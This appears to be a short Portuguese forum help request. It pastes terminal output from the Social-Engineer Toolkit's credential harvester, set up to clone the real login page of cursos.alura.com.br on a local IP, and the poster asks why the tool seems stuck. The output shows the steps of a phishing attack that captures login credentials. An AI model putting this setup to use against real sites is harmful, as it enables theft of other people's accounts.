Coloco a URL do site pra ser clonado depois disso ele fica. set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.15.36]:192.168.15.36[-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:https://cursos.alura.com.br/loginForm?urlAfterLogin=http://cursos.alura.com.br/dashboard
[] Cloning the website: https://cursos.alura.com.br/loginForm?urlAfterLogin=http://cursos.alura.com.br/dashboard [] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [] The Social-Engineer Toolkit Credential Harvester Attack [] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
Ele não sai mais disso, ajuda
